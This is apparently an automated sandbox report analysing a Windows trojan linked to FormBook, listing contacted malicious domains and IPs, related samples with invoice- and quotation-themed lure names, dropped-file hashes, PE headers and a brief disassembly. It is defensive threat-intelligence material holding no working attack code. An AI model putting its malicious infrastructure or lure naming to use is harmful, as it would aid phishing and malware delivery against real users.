http://www.cruycq.info/0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk | false | Avira URL Cloud: malware | unknown
http://www.l33900.xyz/gwiz/ | false | Avira URL Cloud: malware | unknown
http://www.qzsazi.info/iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk | false | Avira URL Cloud: malware | unknown
http://www.qzsazi.info/iwsk/ | false | Avira URL Cloud: malware | unknown
http://www.sigaque.today/n61y/ | false | Avira URL Cloud: malware | unknown
http://www.l33900.xyz/gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk | false | Avira URL Cloud: malware | unknown
http://www.woodsplace.net/cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk= | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/v20 | sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtabv20 | sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/ | sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org?q= | sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.l33900.xyz | UJarIfYl5U.exe, 0000000B.00000002.3671463232.00000000057FE000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://gemini.google.com/app?q= | sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://wx.longwaysun.com/app/register.php?site_id=2 | sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
144.76.229.203 | 031233226.xyz | Germany | 24940 | HETZNER-ASDE | false
13.248.213.45 | woodsplace.net | United States | 16509 | AMAZON-02US | false
194.9.94.85 | www.milp.store | Sweden | 39570 | LOOPIASE | false
47.83.1.90 | www.qzsazi.info | United States | 3209 | VODANETInternationalIP-BackboneofVodafoneDE | false
104.21.32.1 | www.sigaque.today | United States | 13335 | CLOUDFLARENETUS | false
162.218.30.235 | www.l33900.xyz | United States | 62587 | ANT-CLOUDUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1653437
Start date and time: 2025-04-01 09:01:30 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: eoIIBcxUj3.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name: c2c8b9851e807452f57cd7a1fabec3ba
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@24/6
Cookbook Comments:
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.204.23.20, 204.79.197.222, 20.109.210.53
• Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
Time | Type | Description
03:03:40 | API Interceptor | 10402829x Sleep call for process: sfc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
144.76.229.203 | March_00027290_7729.exe | malicious | FormBook | www.031232899.xyz/do0s/
 | ORDER NO_PO-001839811401_MARCH_28_2025.exe | malicious | FormBook | www.031232899.xyz/do0s/
 | ungziped_file.exe | malicious | FormBook | www.031235246.xyz/an37/
 | SC-906-GVA DESHBANDHU.exe | malicious | FormBook | www.031235045.xyz/tjx1/
 | mKv3sKQ5Q4E7waF.exe | malicious | FormBook | www.031235045.xyz/tjx1/
 | 34567898765.exe | malicious | FormBook | www.031235064.xyz/8ijm/
 | Urgent Purchase Order.vbe | malicious | FormBook | www.031235045.xyz/x35a/
 | Quotation.exe | malicious | FormBook | www.031235064.xyz/8ijm/
 | Quotation.exe | malicious | FormBook | www.031235064.xyz/8ijm/
 | AAHiVVNIKQESryT.exe | malicious | FormBook | www.031235045.xyz/tjx1/
13.248.213.45 | RN# D7521-RN-00353 REV-2.exe | malicious | FormBook | www.mjmegartravel.online/t2sm/
 | na.doc | malicious | FormBook | www.thecareskin.com/btrd/?dnpxPL=MPO8Ot&NPY8=AbeIgGnzBU83HSXrQkpvN+QaXMHa/Smw3FQvIGYyvMJrWwYzMis5HD6DdthggtUmTF7mFQ==
 | firmware.sh4.elf | malicious | Unknown | 13.248.213.45/
 | irlsever.doc | malicious | FormBook | www.microsofr.fun/omnp/
 | Wk8eTHnajw.elf | malicious | Unknown | bizvegan.com/
 | Tenuto.exe | malicious | FormBook, GuLoader, LummaC Stealer | www.osbornesargent.co.uk/md49/
194.9.94.85 | ZDQZvxRL2e.exe | malicious | FormBook | www.milp.store/4wod/
 | viILoOTXYf.exe | malicious | FormBook | www.milp.store/4wod/?Nz=tf9PV&qBo=fl5o+RjabZI4bDPOONv1k42Zlqc9nRFonSrjDDLfoFsWCi+K3/9NGbmUoc/k4l0ETdDL1GBm6/3eJIMTLCuCtP2xfyAY7zeiZfO2NGK1s/hQgU305XfS0Wg=
 | yloe82Jp1k.exe | malicious | FormBook | www.milp.store/5okx/
 | g1V10ssekg.exe | malicious | FormBook | www.milp.store/5okx/?UPV=rcIZgusooP3F15rLxZDud6xXj9GvmeIMDSMXn/eRfDMVJgFB6bjmi/bQhBXB6mE8kMRzhYMkKhir5mDouZLbZHEj7q5AS4j1BqPvDeLkw5rzdSCB0A==&YrV=FlsDgRMx
 | Solicitud de cotizacion.exe | malicious | FormBook | www.milp.store/5okx/
 | 44EgbQcEla.exe | malicious | FormBook | www.milp.store/5okx/
 | 99UbUXnwA9.exe | malicious | FormBook | www.milp.store/5okx/
 | Curriculum Vitae.exe | malicious | FormBook | www.milp.store/5okx/
 | PO-0005082025 pdf.exe | malicious | FormBook, PureLog Stealer | www.milp.store/2j93/
 | PO-000172483 pdf.exe | malicious | FormBook, PureLog Stealer | www.milp.store/2j93/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.l33900.xyz | sY8Sfsplzf.exe | malicious | FormBook | 162.218.30.235
 | UhuGtHUgHf.exe | malicious | FormBook | 162.218.30.235
 | yloe82Jp1k.exe | malicious | FormBook | 162.218.30.235
 | g1V10ssekg.exe | malicious | FormBook | 162.218.30.235
 | Solicitud de cotizacion.exe | malicious | FormBook | 162.218.30.235
 | 44EgbQcEla.exe | malicious | FormBook | 162.218.30.235
 | 99UbUXnwA9.exe | malicious | FormBook | 162.218.30.235
 | Curriculum Vitae.exe | malicious | FormBook | 162.218.30.235
 | New order BPD-003777.exe | malicious | FormBook | 162.218.30.235
www.qzsazi.info | yloe82Jp1k.exe | malicious | FormBook | 47.83.1.90
 | g1V10ssekg.exe | malicious | FormBook | 47.83.1.90
 | Solicitud de cotizacion.exe | malicious | FormBook | 47.83.1.90
 | PO490102808.exe | malicious | FormBook | 47.83.1.90
 | 44EgbQcEla.exe | malicious | FormBook | 47.83.1.90
 | vmEBHny0Jw.exe | malicious | FormBook | 47.83.1.90
 | 3MnerqRZQh.exe | malicious | FormBook | 47.83.1.90
 | 99UbUXnwA9.exe | malicious | FormBook | 47.83.1.90
 | PO-0049003088.exe | malicious | FormBook | 47.83.1.90
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HETZNER-ASDE
  na.elf | malicious | Prometei | 88.198.246.242
  na.elf | malicious | Prometei | 88.198.246.242
  na.elf | malicious | Prometei | 88.198.246.242
  na.elf | malicious | Prometei | 88.198.246.242
  ZvmRwchN1S.ps1 | malicious | Vidar | 88.99.125.82
  na.elf | malicious | Prometei | 88.198.246.242
  na.elf | malicious | Prometei | 88.198.246.242
  na.elf | malicious | Prometei | 88.198.246.242
  na.elf | malicious | Prometei | 88.198.246.242
  na.elf | malicious | Prometei | 88.198.246.242
VODANETInternationalIP-BackboneofVodafoneDE
  mips.elf | malicious | Unknown | 178.15.1.217
  x86.elf | malicious | Unknown | 88.66.228.64
  mips.elf | malicious | Unknown | 47.65.3.180
  boatnet.x86_64.elf | malicious | Mirai | 47.67.78.184
  HSBC-COPY-INT-WIRE_USD18,794.67 Deposit 35%.exe | malicious | FormBook | 47.83.1.90
  Shipment Update for Order #003666.exe | malicious | FormBook | 47.83.1.90
  bimbo-m68k.elf | malicious | Unknown | 109.44.45.222
  bimbo-mpsl.elf | malicious | Unknown | 188.101.131.36
  bimbo-ppc.elf | malicious | Unknown | 84.61.19.210
  k03ldc.spc.elf | malicious | Unknown | 146.61.7.85
AMAZON-02US
  na.elf | malicious | Prometei | 34.249.145.219
  .i.elf | malicious | Unknown | 34.249.145.219
  na.elf | malicious | Prometei | 34.249.145.219
  na.elf | malicious | Prometei | 54.171.230.55
  na.elf | malicious | Prometei | 34.249.145.219
  na.elf | malicious | Prometei | 13.213.51.196
  aramco requesting quotation.exe | malicious | FormBook | 76.223.54.146
  killua.arm5.elf | malicious | Unknown | 54.171.230.55
  killua.arm7.elf | malicious | Unknown | 34.249.145.219
  ub8ehJSePAfc9FYqZIT6.arc.elf | malicious | Mirai | 34.249.145.219
LOOPIASE
  ZDQZvxRL2e.exe | malicious | FormBook | 194.9.94.85
  viILoOTXYf.exe | malicious | FormBook | 194.9.94.85
  yloe82Jp1k.exe | malicious | FormBook | 194.9.94.85
  g1V10ssekg.exe | malicious | FormBook | 194.9.94.85
  lJEn8ko37k.exe | malicious | FormBook | 194.9.94.86
  Solicitud de cotizacion.exe | malicious | FormBook | 194.9.94.85
  44EgbQcEla.exe | malicious | FormBook | 194.9.94.85
  99UbUXnwA9.exe | malicious | FormBook | 194.9.94.85
  nnBgprBo1I.exe | malicious | FormBook | 194.9.94.85
CLOUDFLARENETUS
  PO Rover 2025-04.exe | malicious | Snake Keylogger | 104.21.96.1
  DHL Express_8922309719.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.32.1
  EncriptadoOOKK50.vbs | malicious | Unknown | 104.21.80.1
  foto_whatsapp_2025-03-31.img.exe | malicious | Unknown | 1.1.1.1
  Fizet#U00e9si_m#U00e1solat_UniCredit Bank_Hungary.bat | malicious | MSIL Logger, MassLogger RAT | 104.21.112.1
  https://check.cymyv.icu/gkcxv.google | malicious | Unknown | 104.21.48.1
  Employee Plan Selection.pdf | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 172.67.70.233
  Quote Press Cushion Pad.vbs | malicious | Unknown | 104.21.32.1
  Order Specifications for Materials.docx.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
  Quote Press Cushion Pad.vbs | malicious | Unknown | 104.21.64.1
                                                            No context
                                                            No context
                                                            Process:C:\Users\user\Desktop\eoIIBcxUj3.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):11288
                                                            Entropy (8bit):7.6306513042729005
                                                            Encrypted:false
                                                            SSDEEP:192:b2wF5KLtwCKc+jymytziZ1P8kr51VI+YMw8tR6qJBNgJarEVcj1nIstq:b3F4LtwCSymyteZ2Q1Vji70OJhVs1IsM
                                                            MD5:2981AF49DD93CAE9AE1C6D5B92AB6482
                                                            SHA1:E110373408683F01C72E25D617B091D56F445EAB
                                                            SHA-256:9B24987BC767FADAEDABC41B611FB094C39B9AFDBC29B01FC05A16D387225699
                                                            SHA-512:FCAD78CB35793F3DC0D0EDA38F68A64A07F7356D4B520408979F79B10EF4BC5A58108C4A0817243DFF1D44E3ACE0610A3522BD9E1EC36830DE0BC979DC3BFB38
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:EA06.....L%W.T....J.R.,....L@. .&a*.....X............ ....3`."q*.......x...@..M...6...d.I..Hbp..(.g.a.l..`....B.l........l.. ...c3............->.............lf....N.6?I........>K...@*>....4..,..]....................S...........C..0..$1c....f>...Y@$>`.......H...P...............#...O.l.I.M@.>. .%8.$..>. .$..... x......T.@.5O......~6@-..S...@j........@".5O.......6..., ..`.s6....o.....6....$?;(...0...&.^. ..9...&.^.$..C...f...0....!...'..7.t...>.#...7.t...>........``.S.v.X..a.........@.6....@.77.l...0....6`.c.I.X.f..0....6b.....6b.....66 =....A..}..........A.....lA.....lA....#C...hd.3.hl....Vf@p...cc....'.c....'.c....`$....c...,aZ. .5.j... ...U... ..K.5.F..>.>... ...X..c.|S......XB.0.....}3f..........&.-..C6`.H.a...........>......]..2v@B54....B51.... .. %.......g.4....f ..T.....`f!..........c...@,>.....6...+,..jn.!.L.,>.....a......,..jn...L.,>......).G....h..v.B>y....3....6.....3..... !.<.....X|@.H.....`.CS....h.a.M.X>@....z@.93.......T.....\g ..... ....#.X}SP
                                                            Process:C:\Users\user\Desktop\eoIIBcxUj3.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288768
                                                            Entropy (8bit):7.994432681723551
                                                            Encrypted:true
                                                            SSDEEP:6144:1HeSZ29Lx5jAT2Xgpm9qZCLxIYlzkl/VIzRklFtIqiOVml:yx5saQkcCLxPlzkQzRa/liOVml
                                                            MD5:8FA33E8E84C5354A288B702B87DD63D2
                                                            SHA1:72E73999DA878FB966E661A7928EE0B5FACBB356
                                                            SHA-256:27FACC5789B7A0B5555184BDE0EDED585D8AA77D6937FC4584449167ED5F8EAF
                                                            SHA-512:9D51E71DB9A3A542EE416550716C0AA9EF95407DBF8479A57D1219757ACBC2FF5C7E21DA399E7B723D2CDE752EAA434792E0B8281A495E7D72E916B02B5F9696
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.l.6AV7TAI0H..17.G78RHN2.6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0H.517FX.6R.G.p.Qz.wc<,:.80ZVE)*.[3& ]%.2Sb$B:e ^h.zb.%(S]|EC8u6P6BV7T<H9..UV.u'P.o().K...x6P._.~UV.R..n().._3^.6P.EI0HB517..78.IO2i.oBV7TEI0H.536CF<8R.J2Q6P6BV7T.]0HB%17H738RH.2Q&P6BT7TCI0HB517NG78RHN2QFT6BT7TEI0H@5q.HG'8RXN2Q6@6BF7TEI0HR517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2.B5N6V7T..4HB%17H.38RXN2Q6P6BV7TEI0Hb51WHG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517
                                                            Process:C:\Windows\SysWOW64\sfc.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):139264
                                                            Entropy (8bit):0.951889861146889
                                                            Encrypted:false
                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaWtPqfPk:CfJ6a9xpnQLqtzKWJntPqfM
                                                            MD5:2791D27717CAB5981A0EA5AD07EE6B64
                                                            SHA1:1ACFA3E6B2D3A682CA918D6C1AA4AEBFBA2D9B75
                                                            SHA-256:A2D12FE1A445318E2A559FA65998843F50469BEDB41B0F8EBEF008DB6EEE1A7F
                                                            SHA-512:74FE33DD01CD441635EA88876E743B755C1092EAE29C8CA71E108995550C7994B1911295FC68F8B6688F0AC1CDB9313FC9A6714FB65BEA3F4956865978006E6F
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\eoIIBcxUj3.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288768
                                                            Entropy (8bit):7.994432681723551
                                                            Encrypted:true
                                                            SSDEEP:6144:1HeSZ29Lx5jAT2Xgpm9qZCLxIYlzkl/VIzRklFtIqiOVml:yx5saQkcCLxPlzkQzRa/liOVml
                                                            MD5:8FA33E8E84C5354A288B702B87DD63D2
                                                            SHA1:72E73999DA878FB966E661A7928EE0B5FACBB356
                                                            SHA-256:27FACC5789B7A0B5555184BDE0EDED585D8AA77D6937FC4584449167ED5F8EAF
                                                            SHA-512:9D51E71DB9A3A542EE416550716C0AA9EF95407DBF8479A57D1219757ACBC2FF5C7E21DA399E7B723D2CDE752EAA434792E0B8281A495E7D72E916B02B5F9696
                                                            Malicious:false
                                                            Preview:.l.6AV7TAI0H..17.G78RHN2.6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0H.517FX.6R.G.p.Qz.wc<,:.80ZVE)*.[3& ]%.2Sb$B:e ^h.zb.%(S]|EC8u6P6BV7T<H9..UV.u'P.o().K...x6P._.~UV.R..n().._3^.6P.EI0HB517..78.IO2i.oBV7TEI0H.536CF<8R.J2Q6P6BV7T.]0HB%17H738RH.2Q&P6BT7TCI0HB517NG78RHN2QFT6BT7TEI0H@5q.HG'8RXN2Q6@6BF7TEI0HR517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2.B5N6V7T..4HB%17H.38RXN2Q6P6BV7TEI0Hb51WHG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517
                                                            Process:C:\Users\user\Desktop\eoIIBcxUj3.exe
                                                            File Type:ASCII text, with very long lines (57350), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):57350
                                                            Entropy (8bit):2.7900409119053484
                                                            Encrypted:false
                                                            SSDEEP:384:kBV9WjQwYKEVecaiJpqGF2zGVfedBHyI8leWl05L1AyP5y+h8fauFR9I487:6y4gL1AyP8KXp
                                                            MD5:581C7189F2C3334467B680F1E70FD26A
                                                            SHA1:60A19ED64B6F8CB9C567311882DE1102868DD1A9
                                                            SHA-256:F60BA40590A4305D4C12CA3D32BE2FC5C976A9C1B001BC92C432532C593AB684
                                                            SHA-512:5A17EA07B76456B3525481FEC20F080577488492462D694D03DAF053E54C25ED999B6D9DD4E59C7BD560F0A7CF19C7CFAF723C083DC63F64F7B346EAE938C8EC
                                                            Malicious:false
                                                            Preview:*0*x*5*5*8*b*e*c*8*1*e*c*c*c*0*2*0*0*0*0*5*6*5*7*b*8*6*b*0*0*0*0*0*0*6*6*8*9*4*5*8*4*b*9*6*5*0*0*0*0*0*0*6*6*8*9*4*d*8*6*b*a*7*2*0*0*0*0*0*0*6*6*8*9*5*5*8*8*b*8*6*e*0*0*0*0*0*0*6*6*8*9*4*5*8*a*b*9*6*5*0*0*0*0*0*0*6*6*8*9*4*d*8*c*b*a*6*c*0*0*0*0*0*0*6*6*8*9*5*5*8*e*b*8*3*3*0*0*0*0*0*0*6*6*8*9*4*5*9*0*b*9*3*2*0*0*0*0*0*0*6*6*8*9*4*d*9*2*b*a*2*e*0*0*0*0*0*0*6*6*8*9*5*5*9*4*b*8*6*4*0*0*0*0*0*0*6*6*8*9*4*5*9*6*b*9*6*c*0*0*0*0*0*0*6*6*8*9*4*d*9*8*b*a*6*c*0*0*0*0*0*0*6*6*8*9*5*5*9*a*3*3*c*0*6*6*8*9*4*5*9*c*b*9*6*e*0*0*0*0*0*0*6*6*8*9*8*d*4*4*f*f*f*f*f*f*b*a*7*4*0*0*0*0*0*0*6*6*8*9*9*5*4*6*f*f*f*f*f*f*b*8*6*4*0*0*0*0*0*0*6*6*8*9*8*5*4*8*f*f*f*f*f*f*b*9*6*c*0*0*0*0*0*0*6*6*8*9*8*d*4*a*f*f*f*f*f*f*b*a*6*c*0*0*0*0*0*0*6*6*8*9*9*5*4*c*f*f*f*f*f*f*b*8*2*e*0*0*0*0*0*0*6*6*8*9*8*5*4*e*f*f*f*f*f*f*b*9*6*4*0*0*0*0*0*0*6*6*8*9*8*d*5*0*f*f*f*f*f*f*b*a*6*c*0*0*0*0*0*0*6*6*8*9*9*5*5*2*f*f*f*f*f*f*b*8*6*c*0*0*0*0*0*0*6*6*8*9*8*5*5*4*f*f*f*f*f*f*3*3*c*9*6*6*8*9*8*d*5*6*f*f*f*f*f*f*b*a*7*5*0*0*0*0*0*0*6*6*8*9
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.133057707895621
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:eoIIBcxUj3.exe
                                                            File size:1'182'208 bytes
                                                            MD5:c2c8b9851e807452f57cd7a1fabec3ba
                                                            SHA1:d38ad61023caa4d2c2b10e3474ed5658d797cc58
                                                            SHA256:64826dad12787e9f9989046e0b0d1f58704e52968dbb12de2fcc948dbf2bf2d0
                                                            SHA512:3225598094182173ea751e6309c2f004b41b15ee1b0c390cfe991211d60c78b941cad038ffd20c58e0d62438c04b9f7347eceb384a3f8947fa46c65095b3d52c
                                                            SSDEEP:24576:PAHnh+eWsN3skA4RV1Hom2KXFmIaleK3JvqW3f2tn5:yh+ZkldoPK1XalD3Vf+
                                                            TLSH:5545AD0273D2C036FFAB92739B6AF60556BD78254133852F13981DB9BD701B2272E663
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                            Icon Hash:aaf3e3e3938382a0
                                                            Entrypoint:0x42800a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6799D872 [Wed Jan 29 07:27:46 2025 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                            Instruction
                                                            call 00007FADB08E469Dh
                                                            jmp 00007FADB08D7454h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [esp+10h]
                                                            mov ecx, dword ptr [esp+14h]
                                                            mov edi, dword ptr [esp+0Ch]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007FADB08D75DAh
                                                            cmp edi, eax
                                                            jc 00007FADB08D793Eh
                                                            bt dword ptr [004C41FCh], 01h
                                                            jnc 00007FADB08D75D9h
                                                            rep movsb
                                                            jmp 00007FADB08D78ECh
                                                            cmp ecx, 00000080h
                                                            jc 00007FADB08D77A4h
                                                            mov eax, edi
                                                            xor eax, esi
                                                            test eax, 0000000Fh
                                                            jne 00007FADB08D75E0h
                                                            bt dword ptr [004BF324h], 01h
                                                            jc 00007FADB08D7AB0h
                                                            bt dword ptr [004C41FCh], 00000000h
                                                            jnc 00007FADB08D777Dh
                                                            test edi, 00000003h
                                                            jne 00007FADB08D778Eh
                                                            test esi, 00000003h
                                                            jne 00007FADB08D776Dh
                                                            bt edi, 02h
                                                            jnc 00007FADB08D75DFh
                                                            mov eax, dword ptr [esi]
                                                            sub ecx, 04h
                                                            lea esi, dword ptr [esi+04h]
                                                            mov dword ptr [edi], eax
                                                            lea edi, dword ptr [edi+04h]
                                                            bt edi, 03h
                                                            jnc 00007FADB08D75E3h
                                                            movq xmm1, qword ptr [esi]
                                                            sub ecx, 08h
                                                            lea esi, dword ptr [esi+08h]
                                                            movq qword ptr [edi], xmm1
                                                            lea edi, dword ptr [edi+08h]
                                                            test esi, 00000007h
                                                            je 00007FADB08D7635h
                                                            bt esi, 03h
                                                            Programming Language:
                                                            • [ASM] VS2013 build 21005
                                                            • [ C ] VS2013 build 21005
                                                            • [C++] VS2013 build 21005
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2013 UPD5 build 40629
                                                            • [RES] VS2013 build 21005
                                                            • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x56320 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
